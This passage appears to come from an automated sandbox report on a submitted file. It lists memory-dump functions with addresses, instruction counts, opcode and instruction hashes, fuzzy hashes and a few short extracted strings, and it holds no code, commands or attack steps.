                                            • Opcode ID: 7212b3d74ff8e9bf2de9756936c0126e12d10afdd61c3143e3ea1f1de038be86
                                            • Instruction ID: 4bab55cb1ce6eb24182f7c5fe0556e837a1462c3c9507de5a6032ad6c6fba8a9
                                            • Opcode Fuzzy Hash: 7212b3d74ff8e9bf2de9756936c0126e12d10afdd61c3143e3ea1f1de038be86
                                            • Instruction Fuzzy Hash: 5BE04F36A08164EFD7219B9CF589784B7E8EB10322F0540A6E4555F141D7A9EC808BD6
                                            Function 0A0A7462 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f907b7f52ee1e152de44d428c235badcfaa78c28f38d49c5e88e7105bb86ae0a
                                            • Instruction ID: 712b370030227f15c0069882063a49b139bea0347114fafb1ff5e47daed7bfb0
                                            • Opcode Fuzzy Hash: f907b7f52ee1e152de44d428c235badcfaa78c28f38d49c5e88e7105bb86ae0a
                                            • Instruction Fuzzy Hash: 26E09231900A6EDBCF16CE90C800ADEF773BF89345F008895D8097B125D3B66A86CF90
                                            Function 0A0AF868 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec381ac6f7f938c92d23bb03ec4e32284c25a7276967ff70839fef474c2d292f
                                            • Instruction ID: 194629f6a983242e1c4021e0b56d976f37e0d237ab676c40e71d5273a7fe510e
                                            • Opcode Fuzzy Hash: ec381ac6f7f938c92d23bb03ec4e32284c25a7276967ff70839fef474c2d292f
                                            • Instruction Fuzzy Hash: ABD0A7344897C10FC317977088234CD7F70EE2221070665DBC0C48E053DA0444C6C793
                                            Function 0A0A2115 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 769ff1890262db3c498eb43351e1e6ad7383de2cd3e3127334f17467007ae2d9
                                            • Instruction ID: da27eac1345df6edee18636213589847e528e1b441c2e2308d05fe1336c13c67
                                            • Opcode Fuzzy Hash: 769ff1890262db3c498eb43351e1e6ad7383de2cd3e3127334f17467007ae2d9
                                            • Instruction Fuzzy Hash: D0D0A77A20A1506FC712EB6CC8A08DA7FE0FFA6300B404C92D2C04B132C631841EC705
                                            Function 0A0A3560 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8c5eb7ea059ce773edc7f5e14f51474c76e956da7542a58cf4b6e5b798d3af8
                                            • Instruction ID: 1d134dcba3462a2b33d78d6779412443aa2adc4ba9da1aed0f4c9d94865bb352
                                            • Opcode Fuzzy Hash: a8c5eb7ea059ce773edc7f5e14f51474c76e956da7542a58cf4b6e5b798d3af8
                                            • Instruction Fuzzy Hash: 7BD05E76A192909FC3124B58B9186A63FA8EFC7221F0A40EFDA418B106C2764902C7E3
                                            Function 0A0AF890 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8713988526bcd2d84ba5a58d80a28a49b554f8532878e9c9863f5da89cb4df9
                                            • Instruction ID: 7ba7f7718a9d99d242fabec8ee035e7635a2aec93b05ce377732b5062f8d44f9
                                            • Opcode Fuzzy Hash: e8713988526bcd2d84ba5a58d80a28a49b554f8532878e9c9863f5da89cb4df9
                                            • Instruction Fuzzy Hash: 1EE0EC341482849FC746DB20D855EA87F61AF55320F1580EEE5849B273D235C816CB42
                                            Function 0A0A1959 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f82e521786a88cce56da5007af329c69c8cd1d8dcfee874a1b8c3af96dded98
                                            • Instruction ID: bb58b3c613d63d081a0f5c1d421df171009df939b515b78fd34278a647ca3d33
                                            • Opcode Fuzzy Hash: 7f82e521786a88cce56da5007af329c69c8cd1d8dcfee874a1b8c3af96dded98
                                            • Instruction Fuzzy Hash: 86D05E311082C8FED742DBB4D951E943F31BF29214F149189E9898B213C1679817DB12
                                            Function 0A0A1968 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da8970be6eaf19253d70c087c99ed0b3a2f35a14b6b2fa6045a13c9afdd45838
                                            • Instruction ID: 3526c213a29a5a331d1ba1b6abd8b0aa9eaf9eb34d558f84c5b26623b3c61e2b
                                            • Opcode Fuzzy Hash: da8970be6eaf19253d70c087c99ed0b3a2f35a14b6b2fa6045a13c9afdd45838
                                            • Instruction Fuzzy Hash: D8C08C36200308FFDB80AFD4C801D96776DAB08720F50E104FA090E201C273FC62DBA2
                                            Function 0A0A58E8 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 997cbba34c2172f440f2bdb42e3549dfa83ac6942f8f039079a70598852752de
                                            • Instruction ID: 3f30f894d1a09a42fea17f426badaa1283af8b9139688d33ab0d975016df5956
                                            • Opcode Fuzzy Hash: 997cbba34c2172f440f2bdb42e3549dfa83ac6942f8f039079a70598852752de
                                            • Instruction Fuzzy Hash: BCC0123680000ADFCB069F80C804AC1F7A1BF29700F0280E1DE080F022D231A938AB82
                                            Function 0A0AF2B0 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fac49bd18bdd90c12cdf4f5c30b55f478066477870b896fa9dc23e1eed16272b
                                            • Instruction ID: 7fda6fe0439219fcf1e83fef007aa868d25ddf63c41e4a117c6b76f2af0a0836
                                            • Opcode Fuzzy Hash: fac49bd18bdd90c12cdf4f5c30b55f478066477870b896fa9dc23e1eed16272b
                                            • Instruction Fuzzy Hash: 98C0023B044108EFCB025F81E908C95BFAAEB48320705C491F6494A033D772D974EB51
                                            Function 0A0A0760 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3df434a3a2aa800867b9d00e9b318fbd8b0d624f21cae1082ffcdfdde576fa50
                                            • Instruction ID: 1abf9f3b3a2db459bb79da041f409e83873d8fe333312de381b5d26e56306c48
                                            • Opcode Fuzzy Hash: 3df434a3a2aa800867b9d00e9b318fbd8b0d624f21cae1082ffcdfdde576fa50
                                            • Instruction Fuzzy Hash: 00C08C32000208BBCB027E80CD05E49BF2ABB043A0F148008F7040D021D373E923EBC1
                                            Function 0A0AF8A0 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                            • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                            • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                            • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90

                                            Non-executed Functions

                                            Function 028E16A7 Relevance: 5.2, Strings: 4, Instructions: 247COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DN$DN$f%$pR
                                            • API String ID: 0-2140127501
                                            • Opcode ID: 610ff34f706438147d25ab675045aa402a0cbcdb09b05d3c64c78980d5269928
                                            • Instruction ID: b00a58981caf15147c6313ae1c846cd08bfe83beef4a1eaa71a7b621ee0777a8
                                            • Opcode Fuzzy Hash: 610ff34f706438147d25ab675045aa402a0cbcdb09b05d3c64c78980d5269928
                                            • Instruction Fuzzy Hash: 58B12C74E1121A8FCB44DFA8D880A9DBBB2FF89300F509669E419BB355DB30AD45CF90
                                            Function 028E2118 Relevance: 3.9, Strings: 3, Instructions: 177COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $>&$$>&$*,
                                            • API String ID: 0-2034636958
                                            • Opcode ID: ac23f234ef08572a0b34ce88cc49d834f4b04117ef64698f417a3586872dc9c5
                                            • Instruction ID: 8e2d54421500daef98c3d1a09c377be2e96553ebcb92ea346735fb12bc9abd61
                                            • Opcode Fuzzy Hash: ac23f234ef08572a0b34ce88cc49d834f4b04117ef64698f417a3586872dc9c5
                                            • Instruction Fuzzy Hash: 58715978E052099FCF04CFA9D4809AEFBB5FF8A350F10951AD916E7264D330AA41CF90
                                            Function 028E5928 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: sDn$sDn$!ZN
                                            • API String ID: 0-3500289043
                                            • Opcode ID: 21f212b2d0ca4d3c71cd5f4a8237af3084f3bdfba5f78f9bc7c3065868b7f0b2
                                            • Instruction ID: ca2f9468cf0ad7f03dbda182ac861c748d837264e59ff6a8e4df795a24922aed
                                            • Opcode Fuzzy Hash: 21f212b2d0ca4d3c71cd5f4a8237af3084f3bdfba5f78f9bc7c3065868b7f0b2
                                            • Instruction Fuzzy Hash: 1661D178E052099FCF08CFAAD5809DEFBF2EF89218F64942AD415F7254D3389A41CB64
                                            Function 028E5000 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #@|$#@|
                                            • API String ID: 0-2807140629
                                            • Opcode ID: ff005fdf58ececd16b61bee9a99a0e4d44f842fd3717e063a89fe3aa57bd233c
                                            • Instruction ID: 189ffde2deecd9aa45c319c6f55d511d0af251567d66ad75c996cd624edb429d
                                            • Opcode Fuzzy Hash: ff005fdf58ececd16b61bee9a99a0e4d44f842fd3717e063a89fe3aa57bd233c
                                            • Instruction Fuzzy Hash: 9071E5B8D0520ADFCF04CF99D5809AEFBB2BF49314F54951AE416A7311D338A982CF95
                                            Function 028E5919 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: sDn$!ZN
                                            • API String ID: 0-4274154149
                                            • Opcode ID: f32f2ac86830efc951180703dc8ee23ad6b0d8cf4cd7f600aa077213a6ad6817
                                            • Instruction ID: e729f575d7db60f70d9b91f0682a088f50e87242f80b316d9039728791020430
                                            • Opcode Fuzzy Hash: f32f2ac86830efc951180703dc8ee23ad6b0d8cf4cd7f600aa077213a6ad6817
                                            • Instruction Fuzzy Hash: 7761F278E052098FCF08CFA9D5809DEFBF2EF89219F24942AD415F7264D3349A41CB64
                                            Function 028E5308 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,fK,$,fK,
                                            • API String ID: 0-293665814
                                            • Opcode ID: cfc9fe91505262c013939e5d3586c59593409a10a793cdc2a05f501ac51a4e6a
                                            • Instruction ID: 1d8142ea0cd567c47a096b42e390f9f94665f285c88dbc1908d77601f3bb588b
                                            • Opcode Fuzzy Hash: cfc9fe91505262c013939e5d3586c59593409a10a793cdc2a05f501ac51a4e6a
                                            • Instruction Fuzzy Hash: 6E6107B8D042099FCF04CFA9C5805AEFBB2BF4A308F58941AD426B7250D7789641CFA4
                                            Function 028E44A8 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: k9[W
                                            • API String ID: 0-1251553737
                                            • Opcode ID: 542bf8cab9de522b4b59edd2fcc399745fda28919f7e7bcfc8b4cc928630a34b
                                            • Instruction ID: 7a05134123c065f9323986bac62b5da9e3e7f4cf44639dfe74aafcadce69f388
                                            • Opcode Fuzzy Hash: 542bf8cab9de522b4b59edd2fcc399745fda28919f7e7bcfc8b4cc928630a34b
                                            • Instruction Fuzzy Hash: 4F71BD78E11209DFCB48CF99D48499EFBF1FF89210F14856AE92AEB225D734A941CF50
                                            Function 028E4FF0 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #@|
                                            • API String ID: 0-3097398237
                                            • Opcode ID: 71f6952c9f952d13d6c657449f33dd218acc1bfa2db3b97976bc506dd21ba8da
                                            • Instruction ID: c0b825c5ad6717034956d77524c96ad802eb020431ecdceebc56b32af1c8ce77
                                            • Opcode Fuzzy Hash: 71f6952c9f952d13d6c657449f33dd218acc1bfa2db3b97976bc506dd21ba8da
                                            • Instruction Fuzzy Hash: C761E678E0520ACFCB04CF99D5809AEFBB2BF49314F549516D416A7311D338AA82CF95
                                            Function 028E4499 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: k9[W
                                            • API String ID: 0-1251553737
                                            • Opcode ID: 660e135ab2f350b25be66eb666847794f5a74a2dbc0b2a9e743a7c144a8d1d25
                                            • Instruction ID: 4d4c23cb46117e11a829e40a7541181bc524d31b9057e2fbf1376e9131846cbe
                                            • Opcode Fuzzy Hash: 660e135ab2f350b25be66eb666847794f5a74a2dbc0b2a9e743a7c144a8d1d25
                                            • Instruction Fuzzy Hash: 6F71CF78E052099FCB48CFA9D48499EFBF1FF89210F14C56AE42AEB265D734A941CF50
                                            Function 028E5BA0 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WB69
                                            • API String ID: 0-3533285588
                                            • Opcode ID: 3ca190f15800ff028d0f0206cc93e511c9fa23a7e43c52324b7c66062c8d8854
                                            • Instruction ID: 7ec332b5dc8642f696d363c12c30f6d6e16e64e33186759903018c51c5a19a97
                                            • Opcode Fuzzy Hash: 3ca190f15800ff028d0f0206cc93e511c9fa23a7e43c52324b7c66062c8d8854
                                            • Instruction Fuzzy Hash: 165108B8E1520E9BCF04CFA9C5815AEFBB2EF89304F64D469C416F7214E7389A41CB95
                                            Function 028E5B90 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WB69
                                            • API String ID: 0-3533285588
                                            • Opcode ID: 471779a789641805a2747238390254495a5d56d0631dae7ae65437ed81d7c5e6
                                            • Instruction ID: a68f0a8a2875c89cf2e6ef0643d98bc0fed3f502598c18dbd39fe48c0801fb27
                                            • Opcode Fuzzy Hash: 471779a789641805a2747238390254495a5d56d0631dae7ae65437ed81d7c5e6
                                            • Instruction Fuzzy Hash: 85513CB8E1520E8FCF04CFA9C5814AEFBB2EF89314F24D56AC416E7254E7349A41CB91
                                            Function 0A0A70D8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |smp
                                            • API String ID: 0-3595334375
                                            • Opcode ID: f721f32b25198a3e74c7e88f9492f82bdefb0e96ae28e73a0187a4de0e84e787
                                            • Instruction ID: a0470626477f4b70726408fffa3fff8998b3a7a332aaf53d22b6590df76e897d
                                            • Opcode Fuzzy Hash: f721f32b25198a3e74c7e88f9492f82bdefb0e96ae28e73a0187a4de0e84e787
                                            • Instruction Fuzzy Hash: CC21B3B1E016189BEB18CF9BD8547DEFBF7AFC9310F14C16AD518AA254EBB409458F80
                                            Function 0A0A70C9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |smp
                                            • API String ID: 0-3595334375
                                            • Opcode ID: 774a9253173d695536d5ff685e4eca43b6f380a701b6c261555ed6dd0b1cff29
                                            • Instruction ID: 239ba15d04b27f352a80b14170bbe42b95c609ebc907534eb284730fca71212a
                                            • Opcode Fuzzy Hash: 774a9253173d695536d5ff685e4eca43b6f380a701b6c261555ed6dd0b1cff29
                                            • Instruction Fuzzy Hash: D421B7B1E016589BEB58CFABD85439EBBF3AFC9300F14C16AD458AB254DBB809458F40
                                            Function 029AA5A8 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d04b87782a6dd48a1f52714d1e54f6c33ccb9c25c131bf69986f56f0cce2431
                                            • Instruction ID: 59bfe8e1fb64a64fb9567bf9f7701a918de4c1f404583d7577c7dc6d7c269906
                                            • Opcode Fuzzy Hash: 2d04b87782a6dd48a1f52714d1e54f6c33ccb9c25c131bf69986f56f0cce2431
                                            • Instruction Fuzzy Hash: 8012F3F1D99741ABE310CF26E9882A83BA1F7C4318FD74A18C2655B2E4D7F9146ACF44
                                            Function 09985198 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 719518a5103dba52985419a8734a00b30c023a077a4e604bbe7411cc0fa8e044
                                            • Instruction ID: 64a041f2a18731a59b2babb5b6315e6a27c6f942e5567c3c13aa1dbc22368132
                                            • Opcode Fuzzy Hash: 719518a5103dba52985419a8734a00b30c023a077a4e604bbe7411cc0fa8e044
                                            • Instruction Fuzzy Hash: 12E11874E041198FDB14DFA8C5809AEBBF2FF88304F24826AE804AB315DB35AD45CF61
                                            Function 09984928 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6bba60b9d44e60e8272e407dd275b7a8ade4a5f7556b5effd45d73983447ad5
                                            • Instruction ID: 875c8cb21e00971ae52963da0684c80bb6a4ef982d09fb6e6151200e66a32a17
                                            • Opcode Fuzzy Hash: d6bba60b9d44e60e8272e407dd275b7a8ade4a5f7556b5effd45d73983447ad5
                                            • Instruction Fuzzy Hash: 40E1E874E0411A9FDB14DFA9C5809AEBBB2FF88304F248269D814AB355DB35A941CFA0
                                            Function 09986DD0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e3a1ee9749fe0a27fa6999586f8bf90bca7a599e9ad6aff50f0f6e7e80c6f82
                                            • Instruction ID: 76fcae066e717a77554bdcdcfb52977ebf0ad6cc8a0be6de01632aaf1a422149
                                            • Opcode Fuzzy Hash: 5e3a1ee9749fe0a27fa6999586f8bf90bca7a599e9ad6aff50f0f6e7e80c6f82
                                            • Instruction Fuzzy Hash: 5EE1E774E041198FDB14DFA9C5809AEFBB2FF89304F248269E814AB355DB35AD41CF61
                                            Function 09984D60 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cdbd9307f3df9de6d401ccb16f99e1ad8347c37135ae39092d54f2b959351183
                                            • Instruction ID: 046e8e439a146681c4fdb9331c0d068974c1515649fce78629a03be9e0efcec0
                                            • Opcode Fuzzy Hash: cdbd9307f3df9de6d401ccb16f99e1ad8347c37135ae39092d54f2b959351183
                                            • Instruction Fuzzy Hash: EFE1F874E0011A8FDB14DFA8C5809AEBBB2FF89304F24C269E814AB355DB35AD45CF61
                                            Function 09986438 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd4e9514ab831fa6a24e819aee1194676d5833234251a43e444c2539479bb99e
                                            • Instruction ID: 5eebe10b5f359e7965123600ac994535525cf6ddcfb29058e3e694ab9752f996
                                            • Opcode Fuzzy Hash: bd4e9514ab831fa6a24e819aee1194676d5833234251a43e444c2539479bb99e
                                            • Instruction Fuzzy Hash: 4CE1F874E002198FDB14DFA9C5849AEBBF2FF89304F248269D814AB355DB35AD41CF61
                                            Function 0A0A6B17 Relevance: .3, Instructions: 267COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a7f7993a08177691634e94502029c613b04aa1297262138f49e888989ac510e
                                            • Instruction ID: 9dc3ed25ccb3cbc996ca55f277c08e61289e4bde071a5e3efdebcbbb1b9d90d7
                                            • Opcode Fuzzy Hash: 1a7f7993a08177691634e94502029c613b04aa1297262138f49e888989ac510e
                                            • Instruction Fuzzy Hash: 90D13830E14B1ADACB11EB68D9546DDB7B1FF99300F60D79AE40937221EB706AC5CB90
                                            Function 029A85EC Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44d41f771d705de6ff15319e72fb4c485e088c61708ba5a31bbbdc87ab051c01
                                            • Instruction ID: 12ce5e3e521cbad355ba4f68f7acc6049244881e85431ec7aafabea053a34b81
                                            • Opcode Fuzzy Hash: 44d41f771d705de6ff15319e72fb4c485e088c61708ba5a31bbbdc87ab051c01
                                            • Instruction Fuzzy Hash: C9A17B72E003098FDF09DFA9C8545AEB7B6FF85300B15856AE806AB221DB31E915CF80
